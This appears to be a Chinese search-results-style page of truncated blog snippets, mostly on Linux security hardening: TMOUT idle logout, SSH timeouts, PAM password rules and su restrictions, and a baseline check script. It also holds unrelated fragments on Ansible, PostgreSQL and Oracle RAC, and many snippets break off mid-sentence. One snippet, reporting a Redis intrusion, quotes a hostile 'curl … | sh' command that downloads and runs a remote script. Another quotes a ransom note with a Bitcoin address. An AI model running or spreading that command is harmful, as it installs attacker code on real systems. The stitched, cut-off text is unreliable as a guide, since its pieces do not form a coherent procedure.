为了增强linux系统的安全性,需要在用户输入空闲一段时间后自动断开,这个操作是TMOUT值来实现的。查看系统环境变量$TMOUT :
在开发当中经常需要登录远程服务器,于是通过 ssh 或者 putty 登录,可是一转身,这厮就自动断开了。让人非常恼火,如何解决 SSH 连接 Linux 超时自动断开?
刚接手一台新的Linux机器, 登录后安装环境, 可没多久就自动登出了, 影响工作效率, 看看有什么办法可以设置下.
SecureCRT 远程登录连接 Linux/Unix/AIX 服务器时,一段时间不用会自动断开连接,需要重新连接,比较麻烦。可以有以下几种办法,但是生产环境禁用这些,只为个人学习方便,CRT 超时自动断开是出于安全考虑,生产环境如果设置了超时是更加安全,不建议修改。
等保测评主机测评中需要查询主机的超时退出配置,具体在Centos中的话,主要有两种方式可以实现超时退出的功能。其实这方面的资料很多,但是仍然存在一些地方没有说清楚(sshd_config的一个参数),所以本文的目的之一就是把那些问题说清楚。
本文旨在指导系统管理人员或安全检查人员进行Linux操作系统的安全合规性检查和加固。
通过修改home目录下的.bashrc或.bash_profile文件来实现。这两个文件选择其中一个在末尾加入如下一行,具体操作如下:
本文旨在指导系统管理人员或安全检查人员进行Linux操作系统的安全合规性检查和加固。14个Linux系统安全小妙招,总有一招用的上!
版权声明:本文为耕耘实录原创文章,各大自媒体平台同步更新。欢迎转载,转载请注明出处,谢谢
使用命令 vi /etc/pam.d/su修改配置文件,在配置文件中添加行。例如,只允许test组用户su到root,则添加 auth required pam_wheel.so group=test。
在linux系统下,如果下载并安装了应用程序,在启动时很有可能在键入它的名称时出现”command not found”的提示内容。如果每次都到安装目标文件夹内,找到可执行文件
We can use the following way to increase the SSH connection timeout in Linux.
规则描述:MaxAuthTries参数指定每个连接允许的最大验证尝试次数。当登录失败次数达到设置的一半时,错误消息将被写入syslog文件详细记录登录失败。
如果你使用的是SecureCRT,很多人可能会想到工具有反空闲的设置,也是网上能轻易搜到的常用解决方案,可以在超时时间内定时发送一些信息,使得会话保持活跃状态。
grep "/sbin/nologin$" /etc/passwd // 查找登录 Shell 是 /sbin/nologin 的用户
本篇将主要描述在腾讯云平台如何构建Ansible自动化运维管理工具平台/环境,如何批量管理云上服务器,批量分发配置等设置,同时这里将引入某客户真实的案例进行整体的阐述。将从Ansible的基础、架构、常见功能模块,案例解决示例方法进行展开。
1、编辑配置文件/etc/pam.d/system-auth,在文件中找到开头为如下字样的内容:
作为一种开放源代码的操作系统,Linux服务器以其安全,高效和稳定的显著优势而得以广泛应用,但是,若不加以控制,也不见得安全到哪里,这篇博文主要从账号安全控制、系统引导和登录控制的角度,来进行Linux系统安全优化。并且使用辅助工具来查找安全隐患,以便我们及时采取相应的措施。 基本安全措施: 1、 系统各种冗余账号,如“games”等,可直接删除,包括一些程序账号,若卸载程序后,账号没能被删除,则需要我们手动进行删除。
BASH 和 SHELL 变量记录的是当前 shell 的路径, linux 上通常这两个变量的值都是 / bin/bash.
最近看到一个网友在问服务器上的数据库被留下了 “To recover your lost Database and avoid leaking it: Send us 0.05 Bitcoin (BTC) to our Bitcoin address 14yVUjTFesHAusWZ8qytA9faYmKfqEFpYv and contact us by Email with your Server IP or Domain name and a Proof of Payment. Your Database is downloaded and backed up on our servers. If we dont receive your payment in the next 10 Days, we will make your database public or use them otherwise.” 可以看到这个网友的服务器显然是被入侵了,类似这位网友的问题也经常可以看到,遇到这样的问题应该如何处理呢? 通常服务器被入侵后被动的解决是无效的这里要么按照留言付“比特币”给黑客要么只能认倒霉。 所以购买服务器前要提前加固好我们的服务器,本节就来介绍Linux服务器安全加固的10条建议。
大部分程序员可能只停留在写代码阶段。很少有可能接触「Linux」,最多就是看个日志。然而我觉得「Linux」操作对程序员很重要。是提升程序员的一个重要门槛。
作为测评机构一定会知道每年会举行“能力验证”活动,申请认可和获准认可的合格评定机构通过参加能力验证活动(包括 CNAS 组织实施或承认的能力验证计划、测评机构间比对和测量审核)证明其技术能力。之前的线上会议也表明了对测评机构能力建设方面的意见,在会议中说到机构的最高水平不代表机构的真实测评水平,因为机构派来参加能力验证的一般都是经验老道的测评师,所以表面上看起来没啥问题,真实测评中可能会存在很多问题。另外也采取了措施,比如相同人员相隔一年内无法参加能力验证,而且后续还有可能从“团队模式”的情况转化为“单人模式”。
下面的步骤都是按照 9.6 版本进行安装的,如果时境过迁,9.6 也不支持了,只需要更改下面的版本号即可,将 9.6 版本改为你安装的版本,例如版本 10 ,只需要将下面所有的 9.6 改为 10 。
当鼠标和键盘长时间不操作服务器就会自动断开连接,感觉很麻烦
Linux 是一个开放式系统,可以在网络上找到许多现成的程序和工具,这既方便了用户,也方便了黑客,因为他们也能很容易地找到程序和工具来潜入 Linux 系统,或者盗取 Linux 系统上的重要信息。不过,只要我们仔细地设定 Linux 的各种系统功能,并且加上必要的安全措施,就能让黑客们无机可乘。
搞技术的礼物当然是技术礼物啦,这是我们实验室一位师傅改进的linux主机安全基线检查脚本(如果想薅羊毛的兄弟等实验室基本稳定了,Gamma安全实验室会自动把羊毛奉上)
文章最后推介了几个免费视频,B 站和慕课上的免费学习视频挺多,而且有些质量还是不错的。
在使用公司环境申请的虚拟机的时候,老出现两个问题 五分钟没有操作就自动登出 不能使用上下箭头查看历史命令 查了一下,原来就是几个环境变量在作祟 超时登出问题是由于系统设置了TMOUT=300环境变量,可以通过取消这个环境变量或者增加超时时间解决,比如: unset TMOUT 或者 export TMOUT=3600 不能查看历史命令是由于系统设置了HISTFILESIZE=0和HISTSIZE=0环境变量导致,可以通过取消这两个环境变量或者加大值来解决,比如: unset HISTFILESIZE uns
1.检查是否设置口令长度至少8位,并包括数字,小写字符、大写字符和特殊符号4类中至少2类。 在文件/etc/login.defs中设置 PASS_MIN_LEN 不小于标准值 修改/etc/pam.d/system-auth文件, 在ucredit=-1 lcredit=-1 dcredit=-1 ocredit=-1 选3种,追加到password requisite pam_cracklib.so后面,添加到配置文件中。 例如:password requisite pam_cracklib.so ucr
脚本复制粘贴保存成.sh文件即可,报错的请apt,yum下载相应的工具嗷 #! /bin/bash ###################################### # Linux主机安全基线检查 # Date:2020-12-23 # 使用前请给文件执行权限:chmod u+x check.sh # 如提示找不到文件 在vi编辑模式下 set ff=uninx # by Gamma安全实验室 ###################################### scanner_t
Linux是一套免费使用和自由传播的类Unix操作系统,作为一个开放源代码的操作系统,Linux服务器以其安全、高效和稳定的显著优势而得以广泛应用,但如果不做好权限的合理分配,Linux系统的安全性还是会得不到更好的保障,下面我们将主要使用RHEL7系统,分别从账户安全、登录控制,SeLinux配置等,优化Linux系统的安全性。
版权声明:本文为耕耘实录原创文章,各大自媒体平台同步更新。欢迎转载,转载请注明出处,谢谢。
目前,大多数企业在应用中往往是 Linux、Unix 和 Windows 操作系统共存形成异构网络。就安全性而言,Linux 相对于 Windows 具有更多的优势。但是,不管选择哪一种 Linux 发行版本,在安装完成以后都应该进行一些必要的配置,来增强它的安全性。
基本的系统安全 物理安全和登录安全 禁用root登录和sudo 可插拔认证模块(PAM) 基于PAM的口令安全和口令策略 基于PAM的访问控制
sudo的配置文件在/etc/sudoers下面,不过是只读文件。想要修改使用“visudo”命令。
所以,无论是配置任何服务器,我们都必须把不用的服务关闭、把系统权限设置到最小,这样才能保证服务器最大的安全。下面是基于CentOS服务器的安全设置,供大家参考。
将默认配置注释掉,添加一行新的配置,默认的配置为允许root登录,但是禁止root用密码登录
云豆贴心提醒,本文阅读时间8分钟 1.概述 Linux服务器版本:RedHat Linux AS 2.1 对于开放式的操作系统---Linux,系统的安全设定包括系统服务最小化、限制远程存取、隐藏重要资料、修补安全漏洞、采用安全工具以及经常性的安全检查等。 本文主要从用户设置、如何开放服务、系统优化等方面进行系统的安全配置,以到达使Linux服务器更安全、稳定。 2.用户管理 在Linux系统中,用户帐号是用户的身份标志,它由用户名和用户口令组成。 系统将输入的用户名存放在/etc/passwd文件
read命令被用来从标准输入读取单行数据,这个命令可以用来读取键盘输入,当使用重定向以及默认选项的情况下,可以读取文件中的一行数据,此时read会将换行符视为行尾,但是可以使用-d选项更改。
This script is only for 64bit Operating System ! 64位系统专用,老高有修改
本篇的目的是:梳理一份CentOS/RHEL7+11gR2 RAC部署的较标准文档。 结合了公司内部文档及mos等多方材料,尽可能梳理完整。
注:这里是bash环境,如果是csh请把export改成setenv 并用setenv用法(其实就是setenv HISTSIZE 100),在bash中可以把下面内容放在~/.bashrc或者是~/.bash_profile 中,如果是csh就放在~/.cshrc,如果想对所有用户生效,请放在/etc/profile中,一般这些文都有内容可以接着下面写。 1,历史命令记录数100条 #1,Environment variables export HISTSIZE=100 2,PS1值 #2,Sheel prompt-Bash export PS1="\t \u@\h (\w) [\!]$" 3,MASK值,新建文件夹权限700,新建文件权限600 #3,File creation mask umask 077 4,STTY #4,Terminal settings (for remote host only) stty erase ^H 5,DATE #5,Display welcome message echo "Welcome tao" echo "Today is `date`." echo 6,系统登录用户信息 #6,System information echo "Last three logins:";last `logname` |head -3 echo echo "Current users: `users`" echo echo "System uptime:";uptime echo echo "There are `who | wc -l` userids logged in right now." 7,默认编辑器VIM ,翻页器LESS #8,default pager ,editor export PAGER=less export LESS='-CFMs' export EDITOR=vim 8,如果没有操作默认300秒断开 export TMOUT=300 9,给MAN命令加上颜色 9# man pages in color export LESS_TERMCAP_mb=$'\E[01;31m' export LESS_TERMCAP_md=$'\E[01;31m' export LESS_TERMCAP_me=$'\E[0m' export LESS_TERMCAP_se=$'\E[0m' export LESS_TERMCAP_so=$'\E[01;44;33m' export LESS_TERMCAP_ue=$'\E[0m' export LESS_TERMCAP_us=$'\E[01;32m'j
最近主机受到攻击,原因可能是redis集群没有设置密码(因为快过期了,不想搞得太复杂就没设),然后被人家搞事情了,就被人一把set了些执行脚本,形如curl -fsSL http://d.powerofwish.com/pm.sh | sh,真的是猥琐啊,我登上主机一看,简直是猥琐至极,不能忍了啊。
以下是服务器安全加固的步骤,本文以CentOS7.7版本为例来介绍,如果你使用的是秘钥登录服务器1-5步骤可以跳过。
对于linux运维工作者而言,使用ssh远程远程服务器是再熟悉不过的了!对于ssh的一些严格设置也关系到服务器的安全维护,今天在此,就本人工作中使用ssh的经验而言,做一些总结记录来下。 -bash: ssh: command not found 解决办法; yum install -y openssh-server openssh-clinets (0)ssh登录时提示:Read from socket failed: Connection reset by peer. 尝试了很多解决方案均无效,无奈!
作为一种开放源代码的操作系统,Linux服务器以其安全,高效和稳定的显著优势得以广泛应用 可以从账号安全控制,系统引导和登录控制的角度控制Linux系统的安全优化
天天浏览博客的好处就是可以学习新知识,且可以温习旧知识。 以下内容摘自公众号----一口Linux,在此记录一下。
Redhat是目前企业中用的最多的一类Linux,而目前针对Redhat攻击的黑客也越来越多了。我们要如何为这类服务器做好安全加固工作呢?
Linux 是一个开放式系统,可以在网络上找到许多现成的程序和工具,这既方便了用户,也方便了黑.客,因为他们也能很容易地找到程序和工具来潜入 Linux 系统,或者盗取 Linux 系统上的重要信息。不过,只要我们仔细地设定 Linux 的各种系统功能,并且加上必要的安全措施,就能让黑.客们无机可乘。一般来说,对 Linux 系统的安全设定包括取消不必要的服务、限制远程存取、隐藏重要资料、修补安全漏.洞、采用安全工具以及经常性的安全检查等。 说明:以下安全级别表示建议的可操作的级别,星星越多,可操作性越高,建议级别越高
领取专属 10元无门槛券
手把手带您无忧上云